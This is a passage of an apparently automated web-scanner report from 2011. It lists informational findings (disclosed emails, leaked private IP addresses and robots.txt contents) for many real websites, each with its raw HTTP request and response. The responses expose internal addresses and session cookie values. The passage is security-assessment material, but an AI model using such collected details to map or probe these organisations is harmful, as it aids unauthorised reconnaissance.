PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)), (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (v 0 s 0 n 0 l 0)), (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "info@farlex.com" on "2009.10.07T10:15-0400" exp "2013.12.31T12:00-0400" r (l 0 s 0 v 0 o 0))
Date: Sat, 02 Apr 2011 13:27:08 GMT
Content-Length: 894

..............h.......(....... ................................................................................................................................................................! !),)! !
...[SNIP]...
22.13. http://www.travel-ticker.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travel-ticker.com
Path:   /favicon.ico

Issue detail

The following email addresses were disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travel-ticker.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2FB9835EB71FFEAA1AA9FFE640CE8E63; Path=/
Set-Cookie: SaneID=2FB9835EB71FFEAA1AA9FFE640CE8E6; Expires=Sun, 06-Mar-2016 14:16:40 GMT; Path=/
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-control: no-store, no-cache, private, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Sat, 02 Apr 2011 14:16:40 GMT
Set-Cookie: NSC_xxx.usbwfm-ujdlfs-iuuq=ffffffffaf131c3045525d5f4f58455e445a4a422d69;path=/;httponly
Content-Length: 102294


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta name="robots" content="noindex, nofollow">

<link rel="stylesheet" href="
...[SNIP]...
<input type="text" name="TTTellAFriendLayer-yourEmailTellFrnd" value="your_email@address.com"
id="TTTellAFriendLayer-yourEmailTellFrnd"
onfocus="CompSupport.callJsObj(this, 'clearField', [this]);">
...[SNIP]...
<input type="text" name="TTTellAFriendLayer-friendsEmailTellFrnd" value="friends_email@address.com"
id="TTTellAFriendLayer-friendsEmailTellFrnd"
onfocus="CompSupport.callJsObj(this, 'clearField', [this]);">
...[SNIP]...
<input type="text" class="email" id="signUpEmail" name="signUpEmail" value="your_email@address.com"
onfocus="this.select();">
...[SNIP]...
<input type="text" class="email " id="unsubscribeEmail" name="inputEmail" value="your_email@address.com"
onfocus="this.select();">
...[SNIP]...
<input type="text" class="email" id="changeZipEmail" name="signUpEmail" value="your_email@address.com"
onfocus="this.select();">
...[SNIP]...
<input type="text" class="email" id="changeEmail_Email" name="signUpEmail" value="your_email@address.com"
onfocus="this.select();">
...[SNIP]...
22.14. http://www.va.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.va.gov
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.va.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Pragma: no-cache

<html><head><title>Request Rejected</title></head><body>The requested URL was rejected. <br><br>Please contact the VA Network and Security Operations Center at 1-800-877-4328 or email VANSOC@va.gov, if you feel this is in error. <br>
...[SNIP]...
22.15. http://www.wa.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wa.gov
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wa.gov
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:42:28 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1034

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
<link rev="made" href="mailto:servicedesk@dis.wa.gov" />
...[SNIP]...
<a href="mailto:servicedesk@dis.wa.gov">
...[SNIP]...
22.16. http://www.websitealive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.websitealive.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.websitealive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9592
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDCSBSCDBC=MAKNBCJDCBAEBCFJJAGGECIK; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:52:23 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/
...[SNIP]...
<a href="mailto:sales@websitealive.com">sales@websitealive.com</a>
...[SNIP]...
23. Private IP addresses disclosed  previous  next
There are 14 instances of this issue:

23.1. http://www.aa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aa.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:00 GMT
Content-Type: text/plain
Last-Modified: Wed, 30 Sep 2009 14:35:22 GMT
Content-Length: 1406
Content-Language: en-US
Server: On-Demand Router/1.0
Via: On-Demand Router/1.0
Age: 1
Warning: 110 /10.243.14.54:12405 "Response is stale"
Vary: Accept-Encoding, User-Agent

..............h.......(....... ...........@.......................f33.33.......tY......f3..........iK.VM..........f]........l.yn........................................................................
...[SNIP]...
23.2. http://www.americantowns.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americantowns.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americantowns.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=ZONVIRS192.168.6.52CKMQY; path=/
Date: Sat, 02 Apr 2011 13:39:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 17 Dec 2010 19:33:56 GMT
ETag: "550604-436-497a0404a1100"
Accept-Ranges: bytes
Content-Length: 1078
Content-Type: text/plain; charset=UTF-8

...... ..........&...........(.......(... ...@.......................................Hj..[.V.....C...643.5=..Y_\..{s.Tc..........DGW.....?B...3m............3.3.............3..""".....".""(=.3""".....
...[SNIP]...
23.3. http://www.celebuzz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.celebuzz.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.celebuzz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:08 GMT
Server: Apache
Set-Cookie: GEOIP_COUNTRY_CODE=US; path=/; domain=www.celebuzz.com
X-Powered-By: PHP/5.3.5
Content-Length: 0
X-RSID: 172.20.21.34
Content-Type: image/vnd.microsoft.icon

23.4. http://www.facebook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.facebook.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: image/x-icon
Expires: Mon, 02 May 2011 12:36:48 GMT
X-FB-Server: 10.54.238.35
X-Cnection: close
Date: Sat, 02 Apr 2011 12:36:48 GMT
Content-Length: 152

.PNG
.
...IHDR................a..._IDAT8.c...?.%.LXG.8...I.g. U3..m@B.....}...$....,..5...\.h.@~G.?.?...h.\....m.......H....83Q...@..........IEND.B`.
23.5. http://www.findgovernmentjobs.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findgovernmentjobs.info
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.findgovernmentjobs.info
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 File not found
Server: Varnish
X-Varnish: 2176951948
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 14:18:40 GMT
Via: 1.1 varnish 172.17.2.157
Connection: Keep-Alive
Age: 0
Content-Length: 473


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>404 File not found</ti
...[SNIP]...
23.6. http://www.frontier.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.frontier.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc70bab4cCMYJK; expires=Mon, 2-Apr-2012 14:14:35 GMT; path=/
Content-Length: 1406
Content-Type: image/x-icon
Last-Modified: Thu, 04 Mar 2010 19:40:47 GMT
Accept-Ranges: bytes
ETag: "80c92496d2bbca1:523"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:14:43 GMT

..............h.......(....... ...........@.......................MK......:6..>8..@:..D?..HD..WS..c_...~..........8/..91..70..=4..=4..C;..?9..E=..E=..E?..G?..F>..IC..NG..KE..SK..WP..WP..a[..b[..e^..id
...[SNIP]...
23.7. http://www.healthcaresource.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcaresource.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.healthcaresource.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Last-Modified: Wed, 27 Jan 2010 19:32:38 GMT
Date: Sat, 02 Apr 2011 13:51:07 GMT
X-Varnish: 2396180064 2396109138
Via: 1.1 varnish 172.17.34.171
X-Cache: HIT
Content-Length: 0
Connection: Keep-alive
Via: 1.1 AN-0003011042661266

23.8. http://www.lanebryant.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lanebryant.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lanebryant.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 60807
Date: Sat, 02 Apr 2011 13:30:58 GMT
Connection: close

<!DOCTYPE html>
<html lang="en">
   <head>
        <link rel="shortcut icon" type="image/x-icon" href="http://www.lanebryant.com/assets/lb/assets/favicon.ico" />

<title>Lane Bryant | Lane Bryant</t
...[SNIP]...
<script language="JavaScript" type="text/javascript">
s.server = "192.168.187.101";
if (!checkVariable(s.pageName)) {
   s.pageName = 'Not Found';
}

if (!checkVariable(s.channel)) {
   s.channel = "";
}
s.campaign = "";
var eventKey = "";
s.events = eventKey;
s.products = "";
s.purcha
...[SNIP]...
23.9. http://www.myyearbook.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myyearbook.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myyearbook.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:31:54 GMT
Server: Apache
Content-Length: 209
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-MyPoolMember: 10.100.10.83

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...
23.10. http://www.ning.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ning.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-XN-Trace-Token: 9f9c1c9c-5fa1-4bab-8993-14577ccb4134
Server: Ning HTTP Server 2.0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=c5369740-b729-45ac-ba3a-bbb4c515e644;Path=/;Domain=.ning.com;Expires=Tue, 30-Mar-21 13:24:47 GMT
Set-Cookie: ning_session="nAHWdTfdOjMut3QNynKqxXypQ/m+CjPKz2Xk0bPPyn9b46CDeXF+vx+gkz8Znwi2UfKCwpXcPW8=";Path=/;Domain=ning.com;Expires=Sat, 02-Apr-11 14:24:47 GMT
XN-ResponseFrom: 10.16.33.64,(10.16.106.52,200,6)
Date: Sat, 02 Apr 2011 13:24:47 GMT
Last-Modified: Thu, 31 Mar 2011 23:15:59 GMT
ETag: "408973-57e-49fcf79e5e9c0"
Accept-Ranges: bytes
Content-Type: image/x-icon
Cache-Control: max-age=0
Content-Length: 1406

..............h.......(....... ...............................~...O.~.........[...C.u.....................r.............................................................................................
...[SNIP]...
23.11. http://www.phoneagentsource.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.phoneagentsource.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.phoneagentsource.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:54 GMT
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Last-Modified: Wed, 09 Mar 2011 07:44:32 GMT
Content-Length: 17542
X-Varnish: 723278010 723267690
Age: 72
Via: 1.1 varnish 172.17.66.126
X-Cache: HIT

......00.... ..%..F... .... ......%........ ..    ...6........ .h....@..(...0...`..... ......%......................................................................@@@.@@@.@@@.@@@+@@@2@@@3@@@3@@@3@@@3@@
...[SNIP]...
23.12. http://www.shoebuy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shoebuy.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shoebuy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 24 Sep 2008 05:15:33 GMT
ETag: "47e-5fa56740"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Expires: Sat, 02 Apr 2011 13:51:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:51:37 GMT
Connection: close
Set-Cookie: sb2=AAAAgU2XKekAACDvAwsZAg==; path=/; expires=Thu, 31-Mar-16 13:51:37 GMT
Set-Cookie: NSC_1-26STU9-qh10.101.208.14=ffffffff096d444b45525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 14:06:37 GMT;path=/

............ .h.......(....... ..... ..............................................................................................................................}{..zw...............................
...[SNIP]...
23.13. http://www.tracfone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tracfone.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tracfone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: TFWirelessA=R2837728125; path=/; expires=Sat, 02-Apr-2011 14:03:25 GMT
Date: Sat, 02 Apr 2011 13:33:18 GMT
Accept-Ranges: bytes
Content-Length: 1078
Last-Modified: Wed, 04 Mar 2009 22:02:34 GMT
x-wily-servlet: Clear appServerIp=10.248.45.11&agentName=TRAC&servletName=FileServlet&servletResponseTime=0&agentHost=dp-web1&agentProcess=WebLogic
X-Powered-By: Servlet/2.5 JSP/2.1
x-wily-info: Clear guid=166AF1570AF82D0B01733919685DAB4D

...... ..........&...........(.......(... ...@.................................................................................................fffff...........fffff.........fff....fh.......fff....fh.
...[SNIP]...
23.14. http://www.younghollywood.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.younghollywood.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.younghollywood.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 21 Jan 2011 11:44:01 GMT
ETag: "340016c-e36-49a59c42ea240"
Cache-Control: max-age=259200
Expires: Tue, 05 Apr 2011 07:48:58 GMT
Content-Type: image/x-icon
Content-Length: 3638
X-Varnish-IP: 192.168.100.142
Date: Sat, 02 Apr 2011 13:42:07 GMT
X-Varnish: 2005739019 2004915932
Age: 21189
Via: 1.1 varnish
Connection: keep-alive

..............h...&... ..............(....... ...........@............................qa......;"..........UB.......w..........bR..I3..................|k..............kX..........]I..O;...............
...[SNIP]...
24. Robots.txt file  previous  next
There are 962 instances of this issue:

24.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.Google.com/B5219922.27

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Sat, 02 Apr 2011 12:56:49 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
24.2. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:57:07 GMT
Server: Floodlight server
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /
24.3. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 02 Apr 2011 12:44:11 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
24.4. http://pagead2.googlesyndication.com/pagead/imgad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sat, 02 Apr 2011 12:57:38 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
24.5. http://s0.2mdn.net/2830766/cisco_webex_Hard-hit_AllText_728x90_r1.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /2830766/cisco_webex_Hard-hit_AllText_728x90_r1.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 02 Apr 2011 03:55:09 GMT
Expires: Thu, 31 Mar 2011 03:40:19 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Age: 32502
Cache-Control: public, max-age=86400

User-agent: *
Disallow: /
24.6. http://smp.adviva.net/track/v=4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smp.adviva.net
Path:   /track/v=4

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: smp.adviva.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:10 GMT
Server: Apache/2.2.11 (Unix) mod_perl/2.0.4 Perl/v5.10.0
Last-Modified: Tue, 08 Sep 2009 15:43:03 GMT
ETag: "20126-1a-47312d260afc0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /
24.7. http://www.110mb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.110mb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.110mb.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:29:15 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2007 11:11:48 GMT
ETag: "d46035-363-e068a500"
Accept-Ranges: bytes
Content-Length: 867
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /forum/*sa=showPosts*
Disallow: /forum/*prev_next*
Disallow: /forum/*action=printpage*
Disallow: /forum/*action=recent*
Disallow: /forum/*action=login*
Disallow: /forum/*
...[SNIP]...
24.8. http://www.123greetings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.123greetings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.123greetings.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:21 GMT
Expires: Sat, 02 Apr 2011 13:39:32 GMT
Last-Modified: Sat, 13 Mar 2010 05:18:01 GMT
Cache-Control: max-age=900
Content-Type: text/plain; charset=UTF-8
ETag: "8c-c5915440"
Accept-Ranges: bytes
Server: Apache/2.2.3 (CentOS)
Content-Length: 140
Connection: close

User-agent: *
Disallow: /rd1
Disallow: /rd2
Disallow: /aff-bin
Disallow: /send
Disallow: /usr-bin
Disallow: /sendcard
Disallow: /createcard
24.9. http://www.2insure4less.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2insure4less.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.2insure4less.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 10 Aug 2010 17:39:42 GMT
Accept-Ranges: bytes
ETag: "038c3b338cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="CAO PSA OUR"
Date: Sat, 02 Apr 2011 13:45:13 GMT
Connection: close
Content-Length: 269

User-agent: *
Disallow: /App_Code/
Disallow: /aspnet_client/
Disallow: /code/
Disallow: /cpm/
Disallow: /css/
Disallow: /ms/
Disallow: /quotes/
Disallow: /scripts/
Disallow: /Welcomeback/
Di
...[SNIP]...
24.10. http://www.2leep.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2leep.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.2leep.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 02 Apr 2011 13:35:30 GMT
Content-Type: text/plain
Content-Length: 419
Last-Modified: Fri, 26 Nov 2010 07:07:24 GMT
Connection: close
Expires: Mon, 02 May 2011 13:35:30 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

User-Agent: *
Allow: /
Disallow: /auth/
Disallow: /3/
Disallow: /2/
Disallow: /tech/3/
Disallow: /tech/2/
Disallow: /environment/3/
Disallow: /environment/2/
Disallow: /celebrities/3/
Disallow: /celeb
...[SNIP]...
24.11. http://www.411.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.411.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.411.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/plain; charset=utf-8
Date: Sat, 02 Apr 2011 13:42:02 GMT
Status: 200 OK
X-Runtime: 0.00766
ETag: "07f8c36f31f1b5c4a97ad2bac9ef439d"
Connection: close
Set-Cookie: wp_endemic_provider=C; domain=.411.com; path=/; expires=Sun, 03 Apr 2011 01:42:02 GMT
Set-Cookie: wp_perm=pid%3D_aXmJl0uEeCr3gAfKQsxwA; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:02 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:02 GMT
Set-Cookie: _wpn_sid=1197b47dbd0859ffef29c50902fb29df; domain=.411.com; path=/
Content-Length: 1077

User-agent: *
Disallow: /dir/*/*/*/
Disallow: /dir*?
Disallow: /*search/Replay
Disallow: /*search/FindAreacode
Disallow: /*search/ReverseAreacode
Disallow: /*search/FindZip
Disallow: /*search/ReverseZ
...[SNIP]...
24.12. http://www.43things.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.43things.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.43things.com

Response

HTTP/1.1 200 OK
